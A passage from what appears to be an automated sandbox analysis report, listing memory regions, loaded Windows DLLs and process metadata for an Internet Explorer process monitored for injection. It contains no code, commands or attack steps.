= "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3033 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3034 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3035 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3036 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3037 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3038 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3039 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3040 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3041 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3042 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3043 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3044 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3045 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 3047 start_va = 0x5c0000 end_va = 0x6c9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Thread: id = 135 os_tid = 0x1210 Process: id = "37" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0x5fd75000" os_pid = "0x12c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x7e4" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE\" SCODEF:2020 CREDAT:82945 /prefetch:2" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3048 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3049 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3050 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3051 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3052 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3053 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3054 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3055 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3056 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3057 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 3058 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files (x86)\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 3059 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3060 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3061 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3062 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3063 start_va = 0x510000 end_va = 0x511fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 3064 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3065 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3066 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3067 start_va = 0x550000 end_va = 0x553fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 3068 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 3069 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 3070 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3071 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 3072 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 3073 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 3074 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 3075 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 3076 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 3077 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 3078 start_va = 0x980000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 3079 start_va = 0x9c0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 3080 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 3081 start_va = 0x9e0000 end_va = 0xaa9fff monitored = 0 entry_point = 0x9e3a40 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 3082 start_va = 0xab0000 end_va = 0x4aaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 3083 start_va = 0x4ab0000 end_va = 0x4c30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ab0000" filename = "" Region: id = 3084 start_va = 0x4c40000 end_va = 0x603ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c40000" filename = "" Region: id = 3085 start_va = 0x6040000 end_va = 0x6376fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3086 start_va = 0x6380000 end_va = 0x647ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006380000" filename = "" Region: id = 3087 start_va = 0x6480000 end_va = 0x64bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006480000" filename = "" Region: id = 3088 start_va = 0x64c0000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064c0000" filename = "" Region: id = 3089 start_va = 0x6500000 end_va = 0x653ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 3090 start_va = 0x6540000 end_va = 0x6540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006540000" filename = "" Region: id = 3091 start_va = 0x6550000 end_va = 0x6553fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006550000" filename = "" Region: id = 3092 start_va = 0x6560000 end_va = 0x6560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006560000" filename = "" Region: id = 3093 start_va = 0x6570000 end_va = 0x657ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006570000" filename = "" Region: id = 3094 start_va = 0x6580000 end_va = 0x667ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006580000" filename = "" Region: id = 3095 start_va = 0x6680000 end_va = 0x66bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006680000" filename = "" Region: id = 3096 start_va = 0x66c0000 end_va = 0x66c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000066c0000" filename = "" Region: id = 3097 start_va = 0x66d0000 end_va = 0x66d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000066d0000" filename = "" Region: id = 3098 start_va = 0x66e0000 end_va = 0x671ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066e0000" filename = "" Region: id = 3099 start_va = 0x6720000 end_va = 0x6720fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006720000" filename = "" Region: id = 3100 start_va = 0x6730000 end_va = 0x6730fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006730000" filename = "" Region: id = 3101 start_va = 0x6740000 end_va = 0x674ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006740000" filename = "" Region: id = 3102 start_va = 0x6750000 end_va = 0x684ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006750000" filename = "" Region: id = 3103 start_va = 0x6850000 end_va = 0x694ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006850000" filename = "" Region: id = 3104 start_va = 0x6950000 end_va = 0x6a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006950000" filename = "" Region: id = 3105 start_va = 0x6a50000 end_va = 0x6b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a50000" filename = "" Region: id = 3106 start_va = 0x6b50000 end_va = 0x6d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b50000" filename = "" Region: id = 3107 start_va = 0x6d50000 end_va = 0x6e0bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006d50000" filename = "" Region: id = 3108 start_va = 0x6e10000 end_va = 0x6f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e10000" filename = "" Region: id = 3109 start_va = 0x6f10000 end_va = 0x6f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f10000" filename = "" Region: id = 3110 start_va = 0x6f50000 end_va = 0x704ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f50000" filename = "" Region: id = 3111 start_va = 0x7050000 end_va = 0x71d7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ieframe.dll.mui") Region: id = 3112 start_va = 0x71e0000 end_va = 0x725ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000071e0000" filename = "" Region: id = 3113 start_va = 0x7260000 end_va = 0x7260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007260000" filename = "" Region: id = 3114 start_va = 0x7270000 end_va = 0x7270fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007270000" filename = "" Region: id = 3115 start_va = 0x7280000 end_va = 0x7280fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007280000" filename = "" Region: id = 3116 start_va = 0x7290000 end_va = 0x7290fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007290000" filename = "" Region: id = 3117 start_va = 0x72a0000 end_va = 0x72a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 3118 start_va = 0x72b0000 end_va = 0x72bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072b0000" filename = "" Region: id = 3119 start_va = 0x72c0000 end_va = 0x72c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072c0000" filename = "" Region: id = 3120 start_va = 0x72d0000 end_va = 0x72d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072d0000" filename = "" Region: id = 3121 start_va = 0x72e0000 end_va = 0x731ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072e0000" filename = "" Region: id = 3122 start_va = 0x7320000 end_va = 0x735ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007320000" filename = "" Region: id = 3123 start_va = 0x7360000 end_va = 0x775afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007360000" filename = "" Region: id = 3124 start_va = 0x7760000 end_va = 0x779ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007760000" filename = "" Region: id = 3125 start_va = 0x77a0000 end_va = 0x789ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077a0000" filename = "" Region: id = 3126 start_va = 0x78a0000 end_va = 0x78effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000078a0000" filename = "" Region: id = 3127 start_va = 0x78f0000 end_va = 0x79effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000078f0000" filename = "" Region: id = 3128 start_va = 0x79f0000 end_va = 0x7a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079f0000" filename = "" Region: id = 3129 start_va = 0x7a10000 end_va = 0x7a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a10000" filename = "" Region: id = 3130 start_va = 0x7a50000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a50000" filename = "" Region: id = 3131 start_va = 0x7aa0000 end_va = 0x7abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007aa0000" filename = "" Region: id = 3132 start_va = 0x7ac0000 end_va = 0x7afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ac0000" filename = "" Region: id = 3133 start_va = 0x7b00000 end_va = 0x7bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b00000" filename = "" Region: id = 3134 start_va = 0x7c00000 end_va = 0x7c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 3135 start_va = 0x7c20000 end_va = 0x7c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c20000" filename = "" Region: id = 3136 start_va = 0x7c40000 end_va = 0x7c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c40000" filename = "" Region: id = 3137 start_va = 0x7c60000 end_va = 0x7c62fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c60000" filename = "" Region: id = 3138 start_va = 0x7c70000 end_va = 0x7c72fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c70000" filename = "" Region: id = 3139 start_va = 0x7c80000 end_va = 0x7c80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007c80000" filename = "" Region: id = 3140 start_va = 0x7c90000 end_va = 0x7c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c90000" filename = "" Region: id = 3141 start_va = 0x7ca0000 end_va = 0x7caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007ca0000" filename = "" Region: id = 3142 start_va = 0x7cb0000 end_va = 0x7ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007cb0000" filename = "" Region: id = 3143 start_va = 0x7cf0000 end_va = 0x7deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007cf0000" filename = "" Region: id = 3144 start_va = 0x7df0000 end_va = 0x7e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007df0000" filename = "" Region: id = 3145 start_va = 0x7e30000 end_va = 0x7f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e30000" filename = "" Region: id = 3146 start_va = 0x7f30000 end_va = 0x7f5dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f30000" filename = "" Region: id = 3147 start_va = 0x7f60000 end_va = 0x7f60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f60000" filename = "" Region: id = 3148 start_va = 0x7f70000 end_va = 0x7faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f70000" filename = "" Region: id = 3149 start_va = 0x7fb0000 end_va = 0x80affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007fb0000" filename = "" Region: id = 3150 start_va = 0x80b0000 end_va = 0x81affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000080b0000" filename = "" Region: id = 3151 start_va = 0x81b0000 end_va = 0x81effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000081b0000" filename = "" Region: id = 3152 start_va = 0x81f0000 end_va = 0x82effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000081f0000" filename = "" Region: id = 3153 start_va = 0x82f0000 end_va = 0x82f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000082f0000" filename = "" Region: id = 3154 start_va = 0x8300000 end_va = 0x833ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008300000" filename = "" Region: id = 3155 start_va = 0x8340000 end_va = 0x843ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008340000" filename = "" Region: id = 3156 start_va = 0x8440000 end_va = 0x8440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008440000" filename = "" Region: id = 3157 start_va = 0x8450000 end_va = 0x8e13fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008450000" filename = "" Region: id = 3158 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3159 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3160 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3161 start_va = 0x6c770000 end_va = 0x6c987fff monitored = 0 entry_point = 0x6c8197b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 3162 start_va = 0x6c990000 end_va = 0x6cd17fff monitored = 1 entry_point = 0x6cb3fd70 region_type = mapped_file name = "jscript9.dll" filename = "\\Windows\\SysWOW64\\jscript9.dll" (normalized: "c:\\windows\\syswow64\\jscript9.dll") Region: id = 3163 start_va = 0x6cd20000 end_va = 0x6cdc6fff monitored = 0 entry_point = 0x6cd56240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 3164 start_va = 0x6cdd0000 end_va = 0x6ce10fff monitored = 0 entry_point = 0x6cdd7fe0 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\SysWOW64\\DataExchange.dll" (normalized: "c:\\windows\\syswow64\\dataexchange.dll") Region: id = 3165 start_va = 0x6ce20000 end_va = 0x6d010fff monitored = 0 entry_point = 0x6cf03cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 3166 start_va = 0x6d020000 end_va = 0x6d4adfff monitored = 0 entry_point = 0x6d3aa320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 3167 start_va = 0x6d4b0000 end_va = 0x6d62afff monitored = 0 entry_point = 0x6d4fec50 region_type = mapped_file name = "ieapfltr.dll" filename = "\\Windows\\SysWOW64\\ieapfltr.dll" (normalized: "c:\\windows\\syswow64\\ieapfltr.dll") Region: id = 3168 start_va = 0x6d630000 end_va = 0x6e9b1fff monitored = 0 entry_point = 0x6da10ec0 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll") Region: id = 3169 start_va = 0x6ea30000 end_va = 0x6ea62fff monitored = 0 entry_point = 0x6ea40e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 3170 start_va = 0x6ea70000 end_va = 0x6ea79fff monitored = 0 entry_point = 0x6ea73200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3171 start_va = 0x6ea80000 end_va = 0x6eab9fff monitored = 0 entry_point = 0x6ea99be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 3172 start_va = 0x6eac0000 end_va = 0x6eb2ffff monitored = 0 entry_point = 0x6eaf9e70 region_type = mapped_file name = "directmanipulation.dll" filename = "\\Windows\\SysWOW64\\directmanipulation.dll" (normalized: "c:\\windows\\syswow64\\directmanipulation.dll") Region: id = 3173 start_va = 0x6eb30000 end_va = 0x6eb3dfff monitored = 0 entry_point = 0x6eb33f60 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\SysWOW64\\msimtf.dll" (normalized: "c:\\windows\\syswow64\\msimtf.dll") Region: id = 3174 start_va = 0x6eb40000 end_va = 0x6ebb9fff monitored = 0 entry_point = 0x6eb55770 region_type = mapped_file name = "ieui.dll" filename = "\\Windows\\SysWOW64\\ieui.dll" (normalized: "c:\\windows\\syswow64\\ieui.dll") Region: id = 3175 start_va = 0x6ebc0000 end_va = 0x6ec0cfff monitored = 0 entry_point = 0x6ebd58f0 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\SysWOW64\\ninput.dll" (normalized: "c:\\windows\\syswow64\\ninput.dll") Region: id = 3176 start_va = 0x6ec10000 end_va = 0x6ec2bfff monitored = 0 entry_point = 0x6ec22a90 region_type = mapped_file name = "srpapi.dll" filename = "\\Windows\\SysWOW64\\srpapi.dll" (normalized: "c:\\windows\\syswow64\\srpapi.dll") Region: id = 3177 start_va = 0x6ec30000 end_va = 0x6ec5cfff monitored = 0 entry_point = 0x6ec42b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 3178 start_va = 0x6ec60000 end_va = 0x6ecaefff monitored = 0 entry_point = 0x6ec99000 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\SysWOW64\\ieproxy.dll" (normalized: "c:\\windows\\syswow64\\ieproxy.dll") Region: id = 3179 start_va = 0x6ecb0000 end_va = 0x6ecbafff monitored = 0 entry_point = 0x6ecb1d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 3180 start_va = 0x6ecc0000 end_va = 0x6ed14fff monitored = 0 entry_point = 0x6ece3150 region_type = mapped_file name = "ieshims.dll" filename = "\\Program Files (x86)\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieshims.dll") Region: id = 3181 start_va = 0x6ed20000 end_va = 0x6ef2efff monitored = 0 entry_point = 0x6edcb0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 3182 start_va = 0x6ef30000 end_va = 0x6fac8fff monitored = 0 entry_point = 0x6f106970 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 3183 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3184 start_va = 0x70010000 end_va = 0x7003efff monitored = 0 entry_point = 0x700295e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3185 start_va = 0x70040000 end_va = 0x70052fff monitored = 0 entry_point = 0x70049950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3186 start_va = 0x70060000 end_va = 0x70067fff monitored = 0 entry_point = 0x70061d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 3187 start_va = 0x70070000 end_va = 0x70089fff 